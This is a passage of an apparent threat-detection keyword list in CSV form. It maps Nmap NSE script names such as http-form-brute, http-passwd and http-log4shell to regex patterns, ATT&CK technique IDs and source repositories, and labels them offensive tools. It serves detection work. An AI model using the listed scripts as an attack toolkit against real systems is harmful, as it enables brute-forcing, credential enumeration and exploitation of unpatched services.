tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-config-backup.nse*",".{0,1000}\shttp\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cookie-flags.nse*",".{0,1000}\shttp\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cors.nse*",".{0,1000}\shttp\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cross-domain-policy.nse*",".{0,1000}\shttp\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-csrf.nse*",".{0,1000}\shttp\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-date.nse*",".{0,1000}\shttp\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-default-accounts.nse*",".{0,1000}\shttp\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-devframework.nse*",".{0,1000}\shttp\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-dlink-backdoor.nse*",".{0,1000}\shttp\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-dombased-xss.nse*",".{0,1000}\shttp\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-domino-enum-passwords.nse*",".{0,1000}\shttp\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-drupal-enum.nse*",".{0,1000}\shttp\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-drupal-enum-users.nse*",".{0,1000}\shttp\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-enum.nse*",".{0,1000}\shttp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-errors.nse*",".{0,1000}\shttp\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-exif-spider.nse*",".{0,1000}\shttp\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-favicon.nse*",".{0,1000}\shttp\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-feed.nse*",".{0,1000}\shttp\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-fetch.nse*",".{0,1000}\shttp\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-fileupload-exploiter.nse*",".{0,1000}\shttp\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-form-brute.nse*",".{0,1000}\shttp\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-form-fuzzer.nse*",".{0,1000}\shttp\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-frontpage-login.nse*",".{0,1000}\shttp\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-generator.nse*",".{0,1000}\shttp\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-git.nse*",".{0,1000}\shttp\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-gitweb-projects-enum.nse*",".{0,1000}\shttp\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-google-malware.nse*",".{0,1000}\shttp\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-grep.nse*",".{0,1000}\shttp\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-headers.nse*",".{0,1000}\shttp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-hp-ilo-info.nse*",".{0,1000}\shttp\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-huawei-hg5xx-vuln.nse*",".{0,1000}\shttp\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-icloud-findmyiphone.nse*",".{0,1000}\shttp\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-icloud-sendmsg.nse*",".{0,1000}\shttp\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-iis-short-name-brute.nse*",".{0,1000}\shttp\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-iis-webdav-vuln.nse*",".{0,1000}\shttp\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-internal-ip-disclosure.nse*",".{0,1000}\shttp\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-joomla-brute.nse*",".{0,1000}\shttp\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-jsonp-detection.nse*",".{0,1000}\shttp\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-lexmark-version.nse*",".{0,1000}\shttp\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "* http-lfi.nse*",".{0,1000}\shttp\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* http-litespeed-sourcecode-download.nse*",".{0,1000}\shttp\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-log4shell.nse*",".{0,1000}\shttp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* http-ls.nse*",".{0,1000}\shttp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-majordomo2-dir-traversal.nse*",".{0,1000}\shttp\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-malware-host.nse*",".{0,1000}\shttp\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-mcmp.nse*",".{0,1000}\shttp\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-methods.nse*",".{0,1000}\shttp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-method-tamper.nse*",".{0,1000}\shttp\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-mobileversion-checker.nse*",".{0,1000}\shttp\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-nikto-scan.nse*",".{0,1000}\shttp\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "* http-ntlm-info.nse*",".{0,1000}\shttp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-open-proxy.nse*",".{0,1000}\shttp\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-open-redirect.nse*",".{0,1000}\shttp\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-passwd.nse*",".{0,1000}\shttp\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-phpmyadmin-dir-traversal.nse*",".{0,1000}\shttp\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-phpself-xss.nse*",".{0,1000}\shttp\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-php-version.nse*",".{0,1000}\shttp\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-proxy-brute.nse*",".{0,1000}\shttp\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-put.nse*",".{0,1000}\shttp\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-qnap-nas-info.nse*",".{0,1000}\shttp\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
